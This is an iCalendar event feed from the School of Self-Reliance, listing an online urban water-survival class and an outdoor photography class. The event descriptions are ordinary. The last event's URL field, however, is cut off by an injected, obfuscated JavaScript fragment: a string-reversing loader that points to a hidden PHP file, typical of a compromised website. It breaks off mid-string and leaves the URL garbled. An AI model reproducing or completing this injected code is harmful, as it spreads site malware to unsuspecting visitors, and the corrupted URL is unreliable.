BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//School of Self-Reliance - ECPv6.15.13//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:School of Self-Reliance
X-ORIGINAL-URL:https://www.schoolofself-reliance.com
X-WR-CALDESC:Events for School of Self-Reliance
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:America/Los_Angeles
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20210314T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20211107T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20220313T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20221106T090000
END:STANDARD
BEGIN:DAYLIGHT
TZOFFSETFROM:-0800
TZOFFSETTO:-0700
TZNAME:PDT
DTSTART:20230312T100000
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0700
TZOFFSETTO:-0800
TZNAME:PST
DTSTART:20231105T090000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20221028T190000
DTEND;TZID=America/Los_Angeles:20221028T210000
DTSTAMP:20260423T223326
CREATED:20200216T050821Z
LAST-MODIFIED:20221219T061020Z
UID:14554-1666983600-1666990800@www.schoolofself-reliance.com
SUMMARY:URBAN SURVIVAL SERIES:  WATER FOR LIFE --  ON-LINE
DESCRIPTION:  \nFriday\, October 28\, 7 p.m. \nWATER FOR LIFE: Finding it\, Purifying it\, Storing it \nwith a focus on the URBAN environment. \nEveryone needs water\, and no cities exist without a steady water supply. Where do we get our water\, and how reliable is the supply? \nWe’ll explore survival sources of water in both the wilderness and the urban areas.  Some will be surprising.  We’ll look at the various ways to purify water – all four basic methods.  And since you really should keep a supply of water in your home\, we’ll share some of the simple ways to store water in your garage or closet. \nThere’s a lot to think about on this vital topic. \nJoin us for the class and the conversation that follows.  www.SchoolofSelf-Reliance.com \n  \n(Qualifies towards our Weekend Warrior certificate) \n  \nPresented on Zoom \nLink sent to registered students. \n$20  ($15 seniors and students) \n 
URL:https://www.schoolofself-reliance.com/event/weekend-warrior-series-focus-on-water/
CATEGORIES:Survival Skills,Urban skills
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=America/Los_Angeles:20220716T100000
DTEND;TZID=America/Los_Angeles:20220716T140000
DTSTAMP:20260423T223326
CREATED:20220524T041506Z
LAST-MODIFIED:20220716T062328Z
UID:48899-1657965600-1657980000@www.schoolofself-reliance.com
SUMMARY:NEW!    THE ART (and SCIENCE) OF OUTDOOR PHOTOGRAPHY
DESCRIPTION:  \nSATURDAY\, JULY 16\, 10 am to 2 pm \n+ \n\n\n\n\n\n\n\n\n\nTHIS IS AN ALL-NEW CLASS\, TAUGHT BY KEITH FARRAR\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThe Art (and Science) of outdoor photography. \nTESTIMONIAL:   “I thought your material in your class was terrific.  I don’t consider myself a professional photographer but I have taken many classes and workshops from professional photographers.  Your presentation was one of the best overviews of photographic principles I have seen.  It was clear how much time/effort you put into the material–very succinct yet comprehensive. Nicely done!   —  Dave \n\nHeld at Hahamongna Watershed Park\, upper area.  Can’t find us?  Call Christopher at 323 605 7283 \n\nWhile art may be subjective\, the technical side of photography needs to be understood to achieve desired consistent results.\n\nThis class is led by  Keith Farrar\, a professional photographer for over 30 years.  He will cover the topics that will let you achieve the great photographic results you desire.\nHe will address exposure\, how your camera light meter “thinks”\, and the ISO-Aperture-Shutter Speed relationship.  You’ll learn about contrast breakdown\, lighting tips\, hyperfocal focus\, and selecting the proper focal length lens.  Yes\, these things matter!  You’ll learn about circles of confusion\, composition basics\, simple outdoor portraiture\, and more.\n\nWhile some of the material covered will relate to your phone camera\, this class is more appropriate for those using Digital or Film Cameras. No particular camera brand\nwill be covered as the controls are different for each brand. All concepts\, however\, can easily be applied to your particular camera brand.\n\n\n\n\n\nYou can see some samples of Keith’s work here: https://natureskillsschool.com/years-of-photography\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nPHOTOS BY KEITH\n\n\n\n\n\n \n\n\n\n\n\n\n\n  \n  \n  \nWHO NEEDS THIS CLASS: This class is for anyone looking to improve on\, and achieve consistent photographic results. Both for amateur and perspiring professional photographers.\n\nGOALS: The goal of this class is to give you a better understanding of the technical and artistic side of photography\n\nTHIS IS WHAT YOU WILL TAKE HOME FROM THIS CLASS: You will have a much better understanding of the most important technical aspects of photography\, outdoor lighting\, basic outdoor portraiture and nature photography.\nTaught by Keith Farrar
URL:https://www.schoolofself-reliance.com/event/the-art-of-outdoor-pho<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-s/
CATEGORIES:Urban skills
END:VEVENT
END:VCALENDAR